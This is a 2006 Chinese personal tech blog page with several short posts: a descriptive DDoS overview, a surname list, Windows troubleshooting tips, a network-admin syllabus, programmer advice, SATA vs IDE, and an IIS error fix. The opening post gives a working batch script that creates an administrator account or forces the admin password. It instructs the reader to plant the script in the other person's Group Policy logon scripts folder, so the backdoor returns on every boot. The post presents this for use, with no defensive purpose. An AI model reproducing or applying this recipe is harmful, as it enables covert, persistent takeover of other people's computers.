吴伟贤のBlog

Feed Rss

操作步骤:
1、在自己电脑里面建立一个.txt文本文件.
2、在里面输入内容
@echo off
net user 12 12 /add 注释:前面12是用户名后面是密码;
net localgroup administrators 12 /add
3、把这个文件保存,更改后缀为123.bat 注释:前面名字随便,后面格式一定要是bat;
4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。
完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
如果把里面的内容改成
@echo off
net user administrator 12 /add
意思是不管你怎么改,下次启动管理员帐号administrator密码一直是12。

DoS和DDoS的攻击方法浅析

12.24.2006, DoS和DDoS的攻击方法浅析已关闭评论, windows, by .

对DoS而言,其攻击方式很多,主要使用的攻击有3种,分别是TCP-SYN flood、UDP flood和ICMP flood.当用户进行一次标准的TCP连接时,会有一个3次握手过程。首先是请求服务方发送一个SYN消息,服务方收到SYN后,会向请求方回送一个SYN-ACK表示确认,当请求方收到SYN-ACK后,再次向服务方发送一个ACK消息,这样,一次TCP连接建立成功。但是TCP-SYN flood在实现过程中只进行前2个步骤:当服务方收到请求方的SYN-ACK确认消息后,请求方由于采用源地址欺骗等手段使得服务方收不到ACK回应,于是,服务方会在一定时间处于等待接收请求方ACK消息的状态。对于某台服务器来说,可用的TCP连接是有限的,如果恶意攻击方快速连续地发送此类连接请求,该服务器可用的TCP连接队列将很快被阻塞,系统可用资源急剧减少,网络可用带宽迅速缩小,长此下去,网络将无法向用户提供正常的服务。

由于UDP(用户数据包协议)在网络中的应用比较广泛,基于UDP攻击种类也较多。如今在Internet上提供WWW和Mail等服务设备通常是使用Unix的服务器,它们默认一些被恶意利用的UDP服务,如echo和chargen服务,它会显示接收到的每一个数据包,而原本作为测试功能的chargen服务会在收到每一个数据包时随机反馈一些字符,如果恶意攻击者将这2个UDP服务互指,则网络可用带宽将很快耗尽。

目前,我们知道的对网络进行DDoS攻击所使用的工具有:Trinoo、Tribe Flood Network(TFN)、TFN2k和Stacheldraht等。它们的攻击思路基本相近。

1.Trinoo:它是基于UDP flood的攻击软件,它向被攻击目标主机的随机端口发出全零的4字节UDP包,在处理这些超出其处理能力垃圾数据包的过程中,被攻击主机的网络性能不断下降,直到不能提供正常服务,乃至崩溃。它对IP地址不做假,此攻击方法用得不多。

2.TFN:它是利用ICMP给代理服务器下命令,其来源可以做假。它可以发动SYN flood、UDP flood、ICMP flood及Smurf(利用多台服务器发出海量数据包,实施DoS攻击)等攻击。TFN的升级版TFN2k的特点是:对命令数据包加密、更难查询命令内容、命令来源可以做假,还有一个后门控制代理服务器。

3.Stacheldraht:对命令来源做假,而且可以防范一些路由器用RFC2267过滤。若检查出有过滤现象,它将只做假IP地址最后8位,从而让用户无法了解到底是哪几个网段的哪台机器被攻击。此外,它还具有自动更新功能,可随软件的更新而自动更新。

值得一提的是,像Trinoo和TFN等攻击软件都是可以从网上随意找到的公开软件,所以任何一个上网者都可能构成网络安全的潜在威胁。面对凶多吉少的DDoS险滩,我们该如何对付随时出现的黑客攻击呢?杨宁先生说,那要看用户处于何种状态,是正身处被攻击的困围中,还是准备事先预防。

中国百家姓

12.24.2006, 中国百家姓已关闭评论, 杂七杂八, by .

1 李 2王 3张 4刘 5陈 6杨 7赵 8黄 9周 10吴

11徐 12孙 13胡 14朱 15高 16林 17何 18郭 19马 20罗

21梁 22宋 23郑 24谢 25韩 26唐 27冯 28于 29董 30萧

31程 32曹 33袁 34邓 35许 36傅 37沈 38曾 39彭 40吕

41苏 42卢 43蒋 44蔡 45贾 46丁 47魏 48薛 49叶 50阎

51余 52潘 53杜 54戴 55夏 56钟 57汪 58田 59任 60姜

61范 62方 63石 64姚 65谭 66廖 67邹 68熊 69金 70陆

71郝 72孔 73白 74崔 75康 76毛 77邱 78秦 79江 80史

81顾 82侯 83邵 84孟 85龙 86万 87段 88曹 89钱 90汤

91尹 92黎 93易 94常 95武 96乔 97贺 98赖 99龚 100文

Windows XP屏保安装路径

12.24.2006, Windows XP屏保安装路径已关闭评论, windows, by .

(个人意见,仅供参考)
Windows的屏幕保护程序是一个.scr文件。文件默认路径在C:\Windows\system32目录中,名字就是在“显示”属性中的“屏幕保护程序”中的名称。
好像是一个PE格式的可执行文件。在C:Windows\system32目录下的所有*.scr文件都会被Windows的“屏幕保护程序”显示,而文件路径本身保存在System.ini中的SCRNSAVE.EXE=的这条中。在SCRNSAVE.EXE=这条中,其规定的路径也包含了目录名称。即如果我想安装一个.scr文件时,譬如安装路径为D:SCR1.scr,而D:SCR这个目录中还有2.scr,则在这个目录中的所有.scr(1.scr,2.scr)文件都会被显示在“屏幕保护程序”设置中。如果屏幕保护程序设为“(无)”,则SCRNSAVE.EXE=这条不存在。但如果SCRNSAVE.EXE=这条所指的文件或目录是错误的,则在“屏幕保护程序设置”中仍然会显示“(无)”。
至于启动屏幕保护的时间应该在注册表中,HKEY_USERS.DEFAULTControlPaneldesktopScreenSaveTimeOut

在关机过程中,一切正常,但是却停止在“您可以安全地关闭计算机了”却无法自动切断电源,需要手动按主机箱面板上的“Power”键来关机。造成出现该故障的原因一般有以下几个方面:
1. 没有开启电源支持
依次点击“开始→设置→控制面板→电源选项→高能电源管理”,勾选“启用高级电源管理支持”即可。
2. BIOS设置有误
可能是误修改了BIOS中有关电源管理的选项,如果你对BIOS设置比较熟悉,请进入BIOS,试着修改BIOS中有关电源管理的选项。如果你对BIOS不熟悉,那么干脆选择“Load default setup”选项,恢复BIOS到出厂时默认的设置即可。
3. Office XP也惹祸
Office XP当中Ctfmon.exe一直是一个颇有争议的问题。Ctfmon.exe是微软的文本服务文件,只要用户安装了Office XP并且安装了“可选用户输入方法组件,这个文件就会自动调用它,为语音识别、手写识别、键盘以及其它用户输入技术提供文字输入支持。即使我们没有启动Office XP,Ctfmon.exe照样在后台运行。就是它,往往造成了关机故障,你不妨将其卸载试试。
依次点击“开始→设置→控制面板→添加/删除程序”,在目前已安装的程序中选中“Microsoft Office XP Professionain With FrontPage”,点击“更改”按钮,在“维护模式选项”对话框中选择“添加或删除功能”选项,点下一步,弹出“为所有Office应用程序和工具选择安装选项”对话框,展开“Office共享功能”选项,选中“中文可选用户输入方法”选项,在弹出菜单中选择“不安装”,如图2所示,点“更新”按钮即可。
4. APM/NT Legacy Node没有开启
一般情况下APM/NT Legacy Node没有开启可能造成关机却不能自动切断电源。进入设备管理器,点菜单栏中的“查看→显示隐藏的设备”,显示出系统中所有的隐藏设备。在设备列表框中查看有无APM/NT Legacy Node选项。如果你的电脑支持此功能,就会有该选项,双击,在弹出的属性对话框中,点击“启用设备”按钮即可。
5、98系统,你可以点运行-msconfig-在出现的对话框里点高级-选中禁用快速关机。

windows桌面背景取消不掉

12.19.2006, windows桌面背景取消不掉已关闭评论, windows, by .

桌面背景有两种:
第一种你直接用桌面属性更改桌面背景就可以,或者选成无.
第二种,也是在桌面属性的桌面,自定义桌面–>web,把勾去了就可以

成为高级网络管理员必学知识

12.11.2006, 成为高级网络管理员必学知识已关闭评论, windows, by .

学习内容:     第一部分:计算机结构及工作原理、各种零配件的性能参数及主流品牌、计算机硬件的组装,CMOS设置,硬盘的分区,格式化、Windows98/2000/XP的安装、硬件驱动程序和应用程序的安装、Windows注册表的结构,备份及应用、Windows的内核:CPU、内存、硬盘等分配、软硬件系统的优化设置,整机性能评测、计算机病毒的原理及防治、常见软硬件故障的原因,现象及解决、正确分辨市场假货、水货,软硬件产品的销售技巧。       第二部分:网络的基本构成,发展和拓扑设计,10BASE-T局域网的构建与实现,以及各种服务器的结构与特征,以太网对等网等各种方式。TCP/IP的四层模型与OSI七层模型的异同,TCP/IP协议剖析,如何设置IP地址,子网掩码,默认网关,区分子网和网段及集线器,交换机和路由器,RJ45网线制作和种网吧的组建及维护,NT、WIN2000server、Linux服务器的搭建,98对等网的组建与调试和代理服务器的设置     第三部分:Win2000配置,用户及权限、文件及文件夹的管理,新特性活动目录的管理,组策略。网络资源的监控、系统环境的设置、磁盘系统的管理。Web、Ftp、DNS、DHCP、WINS等服务器的安装配置及管理。利用Exchange邮件服务器软件实现企业内部个人邮件信箱服务器、公告栏服务器、网站收发电子邮件服务器、聊天服务器的建立和管理。SQL Server中数据库的创建、表的创建及发布、数据库的备份及恢复、表的导入及导出等一系列维护和管理方法。代理服务器基本原理。利用Microsoft Proxy为例实现代理服务器的设置及管理。 >>更多职位     第四部分:代理服务器基本原理。利用Microsoft Proxy为例实现代理服务器的设置及管理。流行网管软件Cisco Work2000的配置、使用和管理技巧,在一台监控计算机上管理网络中所有的路由器和交换机,实时监控网络流量,及时发现网络问题。路由与交换技术:路由原理的讲解,并通过对路由器配置实例的学习掌握Cisco路由器的常用配置命令及配置。交换原理的讲解,通过对交换机配置实例的学习掌握交换机的常用配置命令及配置。     第五部分:系统进行手工定制、系统性能检测管理、内核设置与编译。ftp服务与Samba服务,其它服务,如,DHCP、NFS等。Web网络服务。包括:Apache服务的配置使用及安全设置。其它web服务软件的介绍。DNS技术及应用。一些简单的路由技术一些简单的负载均衡技术。Mail网络服务。包括:sendmail的配置与使用,Qmail的配置与使用。一些mail客户端程序的使用     第六部分:网络安全的基本概述,网络协议的介绍,常规加密的基本知识,公钥密钥加密的基本知识及数字签名,身份难验证,用PGP及数字证书进行邮件加密实验,全面讲述在环境下实施网络安全对策,Windows98下各种漏洞、攻击类型和防御方法及安全配置方案(系统安全、IE安全、Outlook的安全等)。结合黑客攻击过程全面讲述在      WindowsNT环境下实施网络安全对策。WindowsNT下各种漏洞、攻击类型和防御方法及安全配置方案,全面讲述在Windows2000环境下实施网络安全对策,Windows系统的日志安全、WEB安全,软件防火墙的实施。Windows2000下各种漏洞、攻击类型和防御方法及安全配置方案。        第七部分:Linux管理员部分   一、 基本应用  1、 GNU/linux介绍、Redhat Linux的安装。  2、 系统知识(shell、文件系统、管道与重定向、进程概念)、常用系统命令介绍(ls、cp、mkdir、rm、vi、man、chmod等)  3、 基本系统管理(包括:系统启动过程介绍、磁盘管理、用户管理、日志查看、tar/gz包的使用、rpm软件包管理等。    二、 基本系统服务(包括:图形终端、基本网络服务)(9个课时)  1、 图形终端(即,x-window)的配置与使用。围绕KDE和(或)GNOME,展示UNIX系统的友好界面。  2、 简单的shell教本编写方法,环境变量  3、 Linux下IP网络的基本配置(IP地址、网关、名字)  4、 Linux下的网络服务的配置与使用(包括ftp、DNS、Apache、Sendmail、samba的基本配置)。基于RedHat的setup和linuxconf进行介绍。Webmin管理工具的介绍。       三、 Prerequisite(背景课程)   1、 前言  2、 高级系统管理。包括:系统进行手工定制(inetd,service,ntsysv)、系统性能检测管理(ps,top,tail,dmesg,/proc)。  3、 内核设置与编译。      四、 高级网络应用  1、 ftp服务与Samba服务,其它服务,如,DHCP、NFS等。  2、 Web网络服务。包括:Apache服务的配置使用及安全设置。其它web服务软件的介绍。DNS技术及应用。  3、 一些简单的路由技术  4、 一些简单的负载均衡技术。  5、 Mail网络服务。包括:sendmail的配置与使用,Qmail的配置与使用。一些mail客户端程序的使用。      五、 系统网络安全  1、 包过滤防火墙的理论与应用(NAT技术、内核构架、Ipchains/Iptable的使用),其它非核心态防火墙的介绍。  2、 系统安全。SSH的配置与使用。入侵检测系统及Checkpoint技术与应用  3、 VPN(虚拟网关)的理论与应用。包括:Ipsec、PPTP、认证、密钥交换协议等技术。    六、 总结  混合构建一个安全的网络服务系统。

[程序员必看]请不要做浮躁的人

12.04.2006, [程序员必看]请不要做浮躁的人已关闭评论, 杂七杂八, by .

 1.不要看到别人的回复第一句话就说:给个代码吧!你应该想想为什么。当你自己想出来再参考别人的提示,你就知道自己和别人思路的差异。

  2.初学者请不要看太多太多的书那会误人子弟的,先找本系统的学,很多人用了很久都是只对部分功能熟悉而已,不系统还是不够的。

  3.看帮助,不要因为很难而自己是初学者所以就不看;帮助永远是最好的参考手册,虽然帮助的文字有时候很难看懂,总觉得不够直观。

  4.不要被对象、属性、方法等词汇所迷惑;最根本的是先了解最基础知识。

  5.不要放过任何一个看上去很简单的小问题–他们往往并不那么简单,或者可以引伸出很多知识点;不会举一反三你就永远学不会。

  6.知道一点东西,并不能说明你会写脚本,脚本是需要经验积累的。

  7.学脚本并不难,JSP、ASP、PHP等等也不过如此–难的是长期坚持实践和不遗余力的博览群书;

  8.看再多的书是学不全脚本的,要多实践。

  9.把时髦的技术挂在嘴边,还不如把过时的技术记在心里;

  10.学习脚本最好的方法之一就是多练习;

  11.在任何时刻都不要认为自己手中的书已经足够了;

  12.看得懂的书,请仔细看;看不懂的书,请硬着头皮看;

  13.别指望看第一遍书就能记住和掌握什么——请看第二遍、第三遍;

  14.请把书上的例子亲手到电脑上实践,即使配套光盘中有源文件;

  15.把在书中看到的有意义的例子扩充;并将其切实的运用到自己的工作中;

  16.不要漏掉书中任何一个练习——请全部做完并记录下思路;

  17.当你用脚本到一半却发现自己用的方法很拙劣时,请不要马上停手;请尽快将余下的部分粗略的完成以保证这个代码的完整性,然后分析自己的错误并重新编写和工作。

  18.别心急,写脚本确实不容易;水平是在不断的实践中完善和发展的;

  19.每学到一个脚本难点的时候,尝试着对别人讲解这个知识点并让他理解—-你能讲清楚才说明你真的理解了;

  20.记录下在和别人交流时发现的自己忽视或不理解的知识点;

  21.保存好你做过的所有的源文件—-那是你最好的积累之一;

  22.对于网络,还是希望大家能多利用一下,很多问题不是非要到论坛来问的,首先你要学会自己找答案,比如google、百度都是很好的搜索引擎,你只要输入关键字就能找到很多相关资料,别老是等待别人给你希望,看的出你平时一定也很懒!

  23,到一个论坛,你学会去看以前的帖子,不要什么都不看就发帖子问,也许你的问题早就有人问过了,你再问,别人已经不想再重复了,做为初学者,谁也不希望自己的帖子没人回的。

  24,虽然不是打击初学者,但是这句话还是要说:论坛论坛,就是大家讨论的地方,如果你总期望有高手总无偿指点你,除非他是你亲戚!!讨论者,起码是水平相当的才有讨论的说法,如果水平真差距太远了,连基本操作都需要别人给解答,谁还跟你讨论呢。能找到很多相关资料,别老是等待别人给你希望,看的出你平时一定也很懒!

 
  浮躁的人容易问:我到底该学什么;—-别问,学就对了;
  浮躁的人容易问:JS有钱途吗;—-建议你去抢银行;
  浮躁的人容易说:我要中文版!我英文不行!—-不行?学呀!
  浮躁的人分两种:只观望而不学的人;只学而不坚持的人;
  浮躁的人永远不是一个高手。

SATA硬盘与IDE硬盘的区别

11.26.2006, SATA硬盘与IDE硬盘的区别已关闭评论, windows, by .

IDE接口的区别 IDE即Integrated Drive Electronics,它的本意是指把控制器与盘体集成在一起的硬盘驱动器,我们常说的IDE接口,也叫ATA(Advanced Technology Attachment)接口. Serial ATA是以连续串行的方式传送数据。串行接口的硬盘与Sata的硬盘除了在接口上有所不同以外,在传输率上也是不同的。使用什么接口的硬盘就看你自己了,理论数据上来看SATA快于IDE,但有可能在实际的应用中,两者的差距不是很大。在安装与使用时,其实跟IDE是一样的,插到主板集成的SATA接口上,连接好电源即可。
类似SATA2是SATA的延续技术,串行ATA(SATA)硬盘去年如暴风雨般席卷市场,而采用高容量(单硬盘400GB)、低成本SATA硬盘的子系统也有望在今年继续其增长势头。SATA II技术的产品将于今年晚些时候面向市场。它将突破SATA技术面临的一些局限。其中最主要一点是对原本相对较低性能的提高,其次则是可靠性的改善。
SATA2.0的规格特征:
支持NCQ(Native Command Queue,本机命令队列).
由于磁道捕捉时间和转速的改善和优化,硬盘可更有效的进行信息捕捉/读/写数据。同时,由于硬盘读写头更加有效的转动,也使机械部件之间的磨损减少,增加了硬盘的寿命。
2)SATA 2.0可将性能/带宽提升至300MB/秒,性能上的飞跃使SATA 2.0成为企业工作站和入门级服务器性价比最好的选择。
3)新增了封闭管理功能,包括风扇控制,活动LED指示灯,温度控制和新设备通知等功能。使硬盘工作更加人性化,提供给用户更多的便利
8M是硬盘的缓存,还有2M的
而WD800JD SATA 8M 7200转的意思就是西部数据串口硬盘 8M缓存,转速是7200转目前这种硬盘也可以称为高速硬盘

iis 启动不了,提示发生意外错误0x8ffe2740

11.18.2006, iis 启动不了,提示发生意外错误0x8ffe2740已关闭评论, windows, by .

今天遇到的问题

原因
如果系统中存在端口冲突就有可能发生本情况. IIS默认使用80端口进行HTTP通信. 如果除IIS外的应用程序正在运行并且正在相同的IP地址上使用80端口,在您试图使用IIS管理器启动网站时您也可能收到该错误讯息.

解决方法
要解决这个问题,您可以进行以下任一项操作:
• 在IIS管理器中更改网站绑定端口为除80端口外的其它端口.
• 停止正在使用80端口的应用程序,然后从IIS管理器中启动网站.
更多信息
您可以使用诸如TCPView或FPort等第三方工具来判断其它正在使用80端口的其它应用程序.